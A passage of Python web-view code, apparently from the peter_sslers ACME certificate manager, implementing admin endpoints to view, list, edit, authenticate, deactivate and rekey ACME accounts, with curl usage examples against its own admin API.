self.request.admin_url,
self.dbAcmeAccount.id,
)
return self.dbAcmeAccount
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus",
renderer="/admin/acme_account-focus.mako",
)
@view_config(route_name="admin:acme_account:focus|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/{ID}.json",
"section": "acme-account",
"about": """AcmeAccount record""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1.json",
}
)
def focus(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
_prefix = "%s" % self._focus_url
return {
"AcmeAccount": dbAcmeAccount.as_json,
"raw": {
"pem.txt": "%s/key.pem.txt" % _prefix,
"pem": "%s/key.pem" % _prefix,
"der": "%s/key.key" % _prefix,
},
}
return {"project": "peter_sslers", "AcmeAccount": dbAcmeAccount}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:acme_account:focus:raw", renderer="string")
@docify(
{
"endpoint": "/acme-account/{ID}/key.pem",
"section": "acme-account",
"about": """AcmeAccount focus. Active key as PEM""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/key.pem",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/key.pem.txt",
"section": "acme-account",
"about": """AcmeAccount focus. Active key as PEM.txt""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/key.pem.txt",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/key.key",
"section": "acme-account",
"about": """AcmeAccount focus. Active key as pkcs8 (DER)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/key.key",
}
)
def focus_raw(self):
dbAcmeAccount = self._focus()
if self.request.matchdict["format"] == "pem":
self.request.response.content_type = "application/x-pem-file"
return dbAcmeAccount.acme_account_key.key_pem
elif self.request.matchdict["format"] == "pem.txt":
return dbAcmeAccount.acme_account_key.key_pem
elif self.request.matchdict["format"] == "key":
self.request.response.content_type = "application/pkcs8"
as_der = cert_utils.convert_pem_to_der(
pem_data=dbAcmeAccount.acme_account_key.key_pem
)
return as_der
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:acme_account:focus:parse|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/{ID}/parse.json",
"section": "acme-account",
"about": """AcmeAccount focus. Active key, parsed""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/parse.json",
}
)
def focus_parse_json(self):
dbAcmeAccount = self._focus()
return {
"AcmeAccount": dbAcmeAccount.as_json,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_authorizations",
renderer="/admin/acme_account-focus-acme_authorizations.mako",
)
@view_config(
route_name="admin:acme_account:focus:acme_authorizations_paginated",
renderer="/admin/acme_account-focus-acme_authorizations.mako",
)
@view_config(
route_name="admin:acme_account:focus:acme_authorizations|json",
renderer="json",
)
@view_config(
route_name="admin:acme_account:focus:acme_authorizations_paginated|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-authorizations.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. list AcmeAuthorizations(s)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-authorizations.json",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-authorizations/{PAGE}.json",
"section": "acme-account",
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-authorizations/1.json",
"variant_of": "/acme-account/{ID}/acme-authorizations.json",
}
)
def related__AcmeAuthorizations(self):
dbAcmeAccount = self._focus()
url_status = self.request.params.get("status")
if url_status not in ("active", "active-expired"):
url_status = ""
if url_status == "active":
sidenav_option = "active"
elif url_status == "active-expired":
sidenav_option = "active-expired"
else:
sidenav_option = "all"
active_only = True if url_status == "active" else False
expired_only = True if url_status == "active-expired" else False
items_count = lib_db.get.get__AcmeAuthorization__by_AcmeAccountId__count(
self.request.api_context,
dbAcmeAccount.id,
active_only=active_only,
expired_only=expired_only,
)
url_template = "%s/acme-authorizations/{0}" % self._focus_url
if self.request.wants_json:
url_template = "%s.json" % url_template
if url_status:
url_template = "%s?status=%s" % (url_template, url_status)
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__AcmeAuthorization__by_AcmeAccountId__paginated(
self.request.api_context,
dbAcmeAccount.id,
active_only=active_only,
expired_only=expired_only,
limit=items_per_page,
offset=offset,
)
if self.request.wants_json:
_authorizations = [k.as_json for k in items_paged]
return {
"AcmeAuthorizations": _authorizations,
"pagination": json_pagination(items_count, pager),
}
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"AcmeAuthorizations_count": items_count,
"AcmeAuthorizations": items_paged,
"pager": pager,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_account_keys",
renderer="/admin/acme_account-focus-acme_account_keys.mako",
)
@view_config(
route_name="admin:acme_account:focus:acme_account_keys_paginated",
renderer="/admin/acme_account-focus-acme_account_keys.mako",
)
@view_config(
route_name="admin:acme_account:focus:acme_account_keys|json",
renderer="json",
)
@view_config(
route_name="admin:acme_account:focus:acme_account_keys_paginated|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-account-keys.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. list AcmeAccountKeys(s)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-account-keys.json",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-account-keys/{PAGE}.json",
"section": "acme-account",
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-account-keys/1.json",
"variant_of": "/acme-account/{ID}/acme-account-keys.json",
}
)
def related__AcmeAccountKeys(self):
dbAcmeAccount = self._focus()
items_count = lib_db.get.get__AcmeAccountKey__by_AcmeAccountId__count(
self.request.api_context,
dbAcmeAccount.id,
)
url_template = "%s/acme-account-keys/{0}" % self._focus_url
if self.request.wants_json:
url_template = "%s.json" % url_template
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__AcmeAccountKey__by_AcmeAccountId__paginated(
self.request.api_context,
dbAcmeAccount.id,
limit=items_per_page,
offset=offset,
)
if self.request.wants_json:
_acme_account_keys = [k.as_json for k in items_paged]
return {
"AcmeAccountKeys": _acme_account_keys,
"pagination": json_pagination(items_count, pager),
}
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"AcmeAccountKeys_count": items_count,
"AcmeAccountKeys": items_paged,
"pager": pager,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_orders",
renderer="/admin/acme_account-focus-acme_orders.mako",
)
@view_config(
route_name="admin:acme_account:focus:acme_orders_paginated",
renderer="/admin/acme_account-focus-acme_orders.mako",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-orders.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. list AcmeOrder(s)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-orders.json",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-orders/{PAGE}.json",
"section": "acme-account",
"example": "curl {ADMIN_PREFIX}/acme-account/1/acme-orders/1.json",
"variant_of": "/acme-account/{ID}/acme-orders.json",
}
)
def related__AcmeOrders(self):
dbAcmeAccount = self._focus()
items_count = lib_db.get.get__AcmeOrder__by_AcmeAccountId__count(
self.request.api_context, dbAcmeAccount.id
)
url_template = "%s/acme-orders/{0}" % self._focus_url
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__AcmeOrder__by_AcmeAccountId__paginated(
self.request.api_context,
dbAcmeAccount.id,
limit=items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"AcmeOrders_count": items_count,
"AcmeOrders": items_paged,
"pager": pager,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:private_keys",
renderer="/admin/acme_account-focus-private_keys.mako",
)
@view_config(
route_name="admin:acme_account:focus:private_keys_paginated",
renderer="/admin/acme_account-focus-private_keys.mako",
)
@docify(
{
"endpoint": "/acme-account/{ID}/private-keys.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. list PrivateKeys(s)""",
"POST": None,
"GET": True,
"example": "curl {ADMIN_PREFIX}/acme-account/1/private-keys.json",
}
)
@docify(
{
"endpoint": "/acme-account/{ID}/private-keys/{PAGE}.json",
"section": "acme-account",
"example": "curl {ADMIN_PREFIX}/acme-account/1/private-keys/1.json",
"variant_of": "/acme-account/{ID}/private-keys.json",
}
)
def related__PrivateKeys(self):
dbAcmeAccount = self._focus()
items_count = lib_db.get.get__PrivateKey__by_AcmeAccountIdOwner__count(
self.request.api_context, dbAcmeAccount.id
)
url_template = "%s/private-keys/{0}" % self._focus_url
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__PrivateKey__by_AcmeAccountIdOwner__paginated(
self.request.api_context,
dbAcmeAccount.id,
limit=items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"PrivateKeys_count": items_count,
"PrivateKeys": items_paged,
"pager": pager,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:certificate_signeds",
renderer="/admin/acme_account-focus-certificate_signeds.mako",
)
@view_config(
route_name="admin:acme_account:focus:certificate_signeds_paginated",
renderer="/admin/acme_account-focus-certificate_signeds.mako",
)
def related__CertificateSigneds(self):
dbAcmeAccount = self._focus()
items_count = lib_db.get.get__CertificateSigned__by_AcmeAccountId__count(
self.request.api_context, dbAcmeAccount.id
)
url_template = "%s/certificate-signeds/{0}" % self._focus_url
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__CertificateSigned__by_AcmeAccountId__paginated(
self.request.api_context,
dbAcmeAccount.id,
limit=items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"CertificateSigneds_count": items_count,
"CertificateSigneds": items_paged,
"pager": pager,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:queue_certificates",
renderer="/admin/acme_account-focus-queue_certificates.mako",
)
@view_config(
route_name="admin:acme_account:focus:queue_certificates_paginated",
renderer="/admin/acme_account-focus-queue_certificates.mako",
)
def related__QueueCertificates(self):
dbAcmeAccount = self._focus()
items_count = lib_db.get.get__QueueCertificate__by_AcmeAccountId__count(
self.request.api_context, dbAcmeAccount.id
)
url_template = "%s/queue-certificates/{0}" % self._focus_url
(pager, offset) = self._paginate(items_count, url_template=url_template)
items_paged = lib_db.get.get__QueueCertificate__by_AcmeAccountId__paginated(
self.request.api_context,
dbAcmeAccount.id,
limit=items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"AcmeAccount": dbAcmeAccount,
"QueueCertificates_count": items_count,
"QueueCertificates": items_paged,
"pager": pager,
}
class View_Focus_Manipulate(View_Focus):
@view_config(route_name="admin:acme_account:focus:edit")
@view_config(route_name="admin:acme_account:focus:edit|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/{ID}/edit.json",
"section": "acme-account",
"about": """AcmeAccount: Edit""",
"POST": True,
"GET": None,
"example": "curl {ADMIN_PREFIX}/acme-account/1/edit.json",
"instructions": [
"""curl --form 'account__private_key_cycle=certificate'"""
""" --form 'account__private_key_technology=rsa'"""
""" {ADMIN_PREFIX}/acme-account/{ID}/edit.json""",
],
"form_fields": {
"account__private_key_cycle": "option for cycling the PrivateKey on renewals",
"account__private_key_technology": "what is the key technology preference for this account?",
},
"valid_options": {
"account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
"account__private_key_technology": model_utils.KeyTechnology._options_AcmeAccount_private_key_technology,
},
}
)
def focus_edit(self):
dbAcmeAccount = self._focus()
if self.request.method == "POST":
return self._focus_edit__submit()
return self._focus_edit__print()
def _focus_edit__print(self):
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/edit.json")
return render_to_response(
"/admin/acme_account-focus-edit.mako",
{"AcmeAccount": self.dbAcmeAccount},
self.request,
)
def _focus_edit__submit(self):
try:
(result, formStash) = formhandling.form_validate(
self.request, schema=Form_AcmeAccount_edit, validate_get=False
)
if not result:
raise formhandling.FormInvalid()
event_type = model_utils.OperationsEventType.from_string(
"AcmeAccount__edit"
)
event_payload_dict = utils.new_event_payload_dict()
event_payload_dict["acme_account_id"] = self.dbAcmeAccount.id
event_payload_dict["action"] = "edit"
event_payload_dict["edit"] = {
"old": {},
"new": {},
}
private_key_cycle = formStash.results["account__private_key_cycle"]
if private_key_cycle != self.dbAcmeAccount.private_key_cycle:
try:
event_payload_dict["edit"]["old"][
"private_key_cycle"
] = self.dbAcmeAccount.private_key_cycle
event_payload_dict["edit"]["new"][
"private_key_cycle"
] = private_key_cycle
event_status = lib_db.update.update_AcmeAccount__private_key_cycle(
self.request.api_context,
self.dbAcmeAccount,
private_key_cycle,
)
except errors.InvalidTransition as exc:
# `formStash.fatal_form(` will raise a `FormInvalid()`
formStash.fatal_form(message=exc.args[0])
private_key_technology = formStash.results[
"account__private_key_technology"
]
if private_key_technology != self.dbAcmeAccount.private_key_technology:
try:
event_payload_dict["edit"]["old"][
"private_key_technology"
] = self.dbAcmeAccount.private_key_technology
event_payload_dict["edit"]["new"][
"private_key_technology"
] = private_key_technology
event_status = (
lib_db.update.update_AcmeAccount__private_key_technology(
self.request.api_context,
self.dbAcmeAccount,
private_key_technology,
)
)
except errors.InvalidTransition as exc:
# `formStash.fatal_form(` will raise a `FormInvalid()`
formStash.fatal_form(message=exc.args[0])
# bookkeeping
dbOperationsEvent = lib_db.logger.log__OperationsEvent(
self.request.api_context, event_type, event_payload_dict
)
lib_db.logger._log_object_event(
self.request.api_context,
dbOperationsEvent=dbOperationsEvent,
event_status_id=model_utils.OperationsObjectEventStatus.from_string(
event_status
),
dbAcmeAccount=self.dbAcmeAccount,
)
if self.request.wants_json:
return {
"result": "success",
"AcmeAccount": self.dbAcmeAccount.as_json,
}
url_success = "%s?result=success&operation=edit" % (self._focus_url,)
return HTTPSeeOther(url_success)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return formhandling.form_reprint(self.request, self._focus_edit__print)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def _handle_potentially_deactivated(self, exc):
if exc.args[0] == 403:
if isinstance(exc.args[1], dict):
info = exc.args[1]
# pebble and bounder use the same strings
if info.get("type") == "urn:ietf:params:acme:error:unauthorized":
if (
info.get("detail")
== "An account with the provided public key exists but is deactivated"
):
if not self.dbAcmeAccount.timestamp_deactivated:
lib_db.update.update_AcmeAccount__set_deactivated(
self.request.api_context, self.dbAcmeAccount
)
self.request.api_context.dbSession.flush(
objects=[self.dbAcmeAccount]
)
return True
return False
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_server:authenticate",
renderer=None,
)
@view_config(
route_name="admin:acme_account:focus:acme_server:authenticate|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-server/authenticate.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. ACME Server - Authenticate""",
"summary": """Authenticate the key against the provider's new-reg endpoint""",
"POST": True,
"GET": None,
"instructions": [
"""curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/authenticate.json""",
],
}
)
def focus__acme_server_authenticate(self):
"""
this just hits the api, hoping we authenticate correctly.
"""
dbAcmeAccount = self._focus()
if not dbAcmeAccount.is_can_authenticate:
error_message = "This AcmeAccount can not Authenticate"
if self.request.wants_json:
return {
"error": error_message,
}
url_error = (
"%s?result=error&error=%s&operation=acme-server--authenticate"
% (
self._focus_url,
error_message.replace(" ", "+"),
)
)
return HTTPSeeOther(url_error)
if self.request.method == "POST":
return self._focus__authenticate__submit()
return self._focus__authenticate__print()
def _focus__authenticate__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self, "/acme-account/{ID}/acme-server/authenticate.json"
)
url_post_required = (
"%s?result=error&error=post+required&operation=acme-server--authenticate"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
def _focus__authenticate__submit(self):
dbAcmeAccount = self._focus()
# result is either: `new-account` or `existing-account`
# failing will raise an exception
try:
authenticatedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_authenticate(
self.request.api_context, dbAcmeAccount
)
except errors.AcmeServerError as exc:
if not self._handle_potentially_deactivated(exc):
raise
if self.request.wants_json:
return {"AcmeAccount": dbAcmeAccount.as_json}
return HTTPSeeOther(
"%s?result=success&operation=acme-server--authenticate&is_authenticated=%s"
% (self._focus_url, True)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_server:check",
renderer=None,
)
@view_config(
route_name="admin:acme_account:focus:acme_server:check|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-server/check.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. ACME Server - Check""",
"summary": """Check the key against the provider's new-reg endpoint""",
"POST": True,
"GET": None,
"instructions": [
"""curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/check.json""",
],
}
)
def focus__acme_server_check(self):
"""
this just hits the api, hoping we check correctly.
"""
dbAcmeAccount = self._focus()
if not dbAcmeAccount.is_can_authenticate:
error_message = "This AcmeAccount can not Check"
if self.request.wants_json:
return {
"error": error_message,
}
url_error = "%s?result=error&error=%s&operation=acme-server--check" % (
self._focus_url,
error_message.replace(" ", "+"),
)
return HTTPSeeOther(url_error)
if self.request.method == "POST":
return self._focus__check__submit()
return self._focus__check__print()
def _focus__check__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/acme-server/check.json")
url_post_required = (
"%s?result=error&error=post+required&operation=acme-server--check"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
def _focus__check__submit(self):
dbAcmeAccount = self._focus()
# result is either: `existing-account` or ERROR
# failing will raise an exception
# passing in `onlyReturnExisting` will log the "check"
_result = None
_message = None
try:
checkedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_authenticate(
self.request.api_context, dbAcmeAccount, onlyReturnExisting=True
)
_result = "success"
except errors.AcmeServerError as exc:
# only catch this if `onlyReturnExisting` and there is an DNE error
if (exc.args[0] == 400) and (
exc.args[1]["type"] == "urn:ietf:params:acme:error:accountDoesNotExist"
):
_result = "error"
if "detail" in exc.args[1]:
_message = exc.args[1]["detail"]
else:
raise
if self.request.wants_json:
return {
"AcmeAccount": dbAcmeAccount.as_json,
"is_checked": True,
"result": _result,
"message": _message,
}
_message = quote_plus(_message) if _message else ""
return HTTPSeeOther(
"%s?result=success&operation=acme-server--check&is_checked=%s&result=%s&message=%s"
% (self._focus_url, True, _result, _message)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:acme_account:focus:mark", renderer=None)
@view_config(route_name="admin:acme_account:focus:mark|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/{ID}/mark.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. Mark""",
"POST": True,
"GET": None,
"example": "curl --form 'action=active' {ADMIN_PREFIX}/acme-account/1/mark.json",
"form_fields": {"action": "the intended action"},
"valid_options": {"action": ["global_default", "active", "inactive"]},
}
)
def focus_mark(self):
dbAcmeAccount = self._focus()
if self.request.method == "POST":
return self._focus_mark__submit()
return self._focus_mark__print()
def _focus_mark__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/mark.json")
url_post_required = "%s?result=error&error=post+required&operation=mark" % (
self._focus_url
)
return HTTPSeeOther(url_post_required)
def _focus_mark__submit(self):
dbAcmeAccount = self._focus()
action = self.request.params.get("action")
try:
(result, formStash) = formhandling.form_validate(
self.request,
schema=Form_AcmeAccount_mark,
validate_get=False,
# validate_post=False
)
if not result:
raise formhandling.FormInvalid()
action = formStash.results["action"]
event_type = model_utils.OperationsEventType.from_string(
"AcmeAccount__mark"
)
event_payload_dict = utils.new_event_payload_dict()
event_payload_dict["acme_account_id"] = dbAcmeAccount.id
event_payload_dict["action"] = formStash.results["action"]
event_status = False
event_alt = None
try:
if action == "active":
event_status = lib_db.update.update_AcmeAccount__set_active(
self.request.api_context, dbAcmeAccount
)
elif action == "inactive":
event_status = lib_db.update.update_AcmeAccount__unset_active(
self.request.api_context, dbAcmeAccount
)
elif action == "global_default":
(
event_status,
alt_info,
) = lib_db.update.update_AcmeAccount__set_global_default(
self.request.api_context, dbAcmeAccount
)
if alt_info:
for (k, v) in alt_info["event_payload_dict"].items():
event_payload_dict[k] = v
event_alt = alt_info["event_alt"]
else:
raise errors.InvalidTransition("Invalid option")
except errors.InvalidTransition as exc:
# `formStash.fatal_form(` will raise a `FormInvalid()`
formStash.fatal_form(message=exc.args[0])
self.request.api_context.dbSession.flush(objects=[dbAcmeAccount])
# bookkeeping
dbOperationsEvent = lib_db.logger.log__OperationsEvent(
self.request.api_context, event_type, event_payload_dict
)
lib_db.logger._log_object_event(
self.request.api_context,
dbOperationsEvent=dbOperationsEvent,
event_status_id=model_utils.OperationsObjectEventStatus.from_string(
event_status
),
dbAcmeAccount=dbAcmeAccount,
)
if event_alt:
lib_db.logger._log_object_event(
self.request.api_context,
dbOperationsEvent=dbOperationsEvent,
event_status_id=model_utils.OperationsObjectEventStatus.from_string(
event_alt[0]
),
dbAcmeAccount=event_alt[1],
)
if self.request.wants_json:
return {"result": "success", "AcmeAccount": dbAcmeAccount.as_json}
url_success = "%s?result=success&operation=mark&action=%s" % (
self._focus_url,
action,
)
return HTTPSeeOther(url_success)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
url_failure = "%s?result=error&error=%s&operation=mark&action=%s" % (
self._focus_url,
errors.formstash_to_querystring(formStash),
action,
)
raise HTTPSeeOther(url_failure)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_server:deactivate_pending_authorizations",
renderer=None,
)
@view_config(
route_name="admin:acme_account:focus:acme_server:deactivate_pending_authorizations|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-server/deactivate-pending-authorizations.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. ACME Server - Deactivate Pending Authorizations""",
"summary": """deactivate pending authorizations on the acme server, must supply the authorization_ids""",
"POST": True,
"GET": None,
"instructions": [
"""curl --form 'acme_authorization_id=1' --form 'acme_authorization_id=2' {ADMIN_PREFIX}/acme-account/1/acme-server/deactivate-pending-authorizations.json""",
],
"form_fields": {
"authorization_id": "the pending authorization id to delete ",
},
}
)
def focus__acme_server_deactivate_pending_authorizations(self):
"""
this just hits the api, hoping we authenticate correctly.
"""
dbAcmeAccount = self._focus()
if not dbAcmeAccount.is_can_authenticate:
error_message = "This AcmeAccount can not Authenticate"
if self.request.wants_json:
return {
"error": error_message,
}
url_error = "%s?result=error&error=%s&operation=acme-server--deactivate-pending-authorizations" % (
self._focus_url,
error_message.replace(" ", "+"),
)
return HTTPSeeOther(url_error)
if self.request.method == "POST":
return self._focus__acme_server_deactivate_pending_authorizations__submit()
return self._focus__acme_server_deactivate_pending_authorizations__print()
def _focus__acme_server_deactivate_pending_authorizations__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self,
"/acme-account/{ID}/acme-server/deactivate-pending-authorizations.json",
)
url_post_required = (
"%s/acme-authorizations?status=active&result=error&error=post+required&operation=acme-server--deactivate-pending-authorizations"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
def _focus__acme_server_deactivate_pending_authorizations__submit(self):
dbAcmeAccount = self._focus()
try:
(result, formStash) = formhandling.form_validate(
self.request,
schema=Form_AcmeAccount_deactivate_authorizations,
validate_get=False,
)
if not result:
raise formhandling.FormInvalid()
if not formStash.results["acme_authorization_id"]:
# `formStash.fatal_form()` will raise `FormInvalid()`
formStash.fatal_form(
"You must supply at least one `acme_authorization_id` to deactivate."
)
results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__acme_server_deactivate_authorizations(
self.request.api_context,
dbAcmeAccount=dbAcmeAccount,
acme_authorization_ids=formStash.results["acme_authorization_id"],
)
if self.request.wants_json:
return {
"result": "success",
"results": results,
"AcmeAccount": dbAcmeAccount.as_json,
}
return HTTPSeeOther(
"%s/acme-authorizations?status=active&result=success&operation=acme-server--deactivate-pending-authorizations"
% (self._focus_url,)
)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return HTTPSeeOther(
"%s/acme-authorizations?status=active&result=error&error=%s&operation=acme-server--deactivate-pending-authorizations"
% (
self._focus_url,
errors.formstash_to_querystring(formStash),
)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_server:deactivate",
renderer=None,
)
@view_config(
route_name="admin:acme_account:focus:acme_server:deactivate|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-server/deactivate.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. ACME Server - Deactivate""",
"POST": True,
"GET": None,
"form_fields": {
"key_pem": "the active key as md5(PEM) or PEM",
},
"instructions": [
"""curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/deactivate.json""",
],
}
)
def focus__acme_server_deactivate(self):
"""
this just hits the api, hoping we authenticate correctly.
"""
dbAcmeAccount = self._focus()
if not dbAcmeAccount.is_can_deactivate:
error_message = "This AcmeAccount can not be deactivated"
if self.request.wants_json:
return {
"error": error_message,
}
url_error = "%s?result=error&error=%s&operation=acme-server--deactivate" % (
self._focus_url,
error_message.replace(" ", "+"),
)
return HTTPSeeOther(url_error)
if self.request.method == "POST":
return self._focus__acme_server_deactivate__submit()
return self._focus__acme_server_deactivate__print()
def _focus__acme_server_deactivate__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self, "/acme-account/{ID}/acme-server/deactivate.json"
)
return render_to_response(
"/admin/acme_account-focus-deactivate.mako",
{"AcmeAccount": dbAcmeAccount},
self.request,
)
def _focus__acme_server_deactivate__submit(self):
dbAcmeAccount = self._focus()
try:
(result, formStash) = formhandling.form_validate(
self.request,
schema=Form_AcmeAccount_deactivate,
validate_get=False,
)
if not result:
raise formhandling.FormInvalid()
# `key_pem` can match the full or md5
_key_pem = formStash.results["key_pem"]
if _key_pem != dbAcmeAccount.acme_account_key.key_pem_md5:
_key_pem = cert_utils.cleanup_pem_text(_key_pem)
if _key_pem != dbAcmeAccount.acme_account_key.key_pem:
formStash.fatal_field(
field="key_pem",
message="This does not match the active account key",
)
try:
results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__deactivate(
self.request.api_context,
dbAcmeAccount=dbAcmeAccount,
transaction_commit=True,
)
except errors.AcmeServerError as exc:
if self._handle_potentially_deactivated(exc):
formStash.fatal_form(message=str(exc.args[1]))
raise
if self.request.wants_json:
return {
"result": "success",
"AcmeAccount": dbAcmeAccount.as_json,
}
return HTTPSeeOther(
"%s?result=success&operation=acme-server--deactivate"
% (self._focus_url,)
)
except formhandling.FormInvalid as exc: # noqa: F841
if self.request.wants_json:
return {"result": "error", "form_errors": formStash.errors}
return formhandling.form_reprint(
self.request, self._focus__acme_server_deactivate__print
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:acme_account:focus:acme_server:key_change",
renderer=None,
)
@view_config(
route_name="admin:acme_account:focus:acme_server:key_change|json",
renderer="json",
)
@docify(
{
"endpoint": "/acme-account/{ID}/acme-server/key-change.json",
"section": "acme-account",
"about": """AcmeAccount: Focus. ACME Server - KeyChange""",
"POST": True,
"GET": None,
"instructions": [
"""curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/key-change.json""",
],
"form_fields": {
"key_pem_existing": "the active key as md5(PEM) or PEM",
},
}
)
def focus__acme_server_key_change(self):
"""
this just hits the api, hoping we authenticate correctly.
"""
dbAcmeAccount = self._focus()
if self.request.method == "POST":
return self._focus__acme_server_key_change__submit()
if not dbAcmeAccount.is_can_key_change:
error_message = "This AcmeAccount can not be key changed"
if self.request.wants_json:
return {
"error": error_message,
}
url_error = "%s?result=error&error=%s&operation=acme-server--key-change" % (
self._focus_url,
error_message.replace(" ", "+"),
)
return HTTPSeeOther(url_error)
return self._focus__acme_server_key_change__print()
def _focus__acme_server_key_change__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self, "/acme-account/{ID}/acme-server/key-change.json"
)
return render_to_response(
"/admin/acme_account-focus-key_change.mako",
{"AcmeAccount": dbAcmeAccount},
self.request,
)
def _focus__acme_server_key_change__submit(self):
dbAcmeAccount = self._focus()
try:
(result, formStash) = formhandling.form_validate(
self.request,
schema=Form_AcmeAccount_key_change,
validate_get=False,
)
if not result:
raise formhandling.FormInvalid()
# `key_pem` can match the full or md5
_key_pem_old = formStash.results["key_pem_existing"]
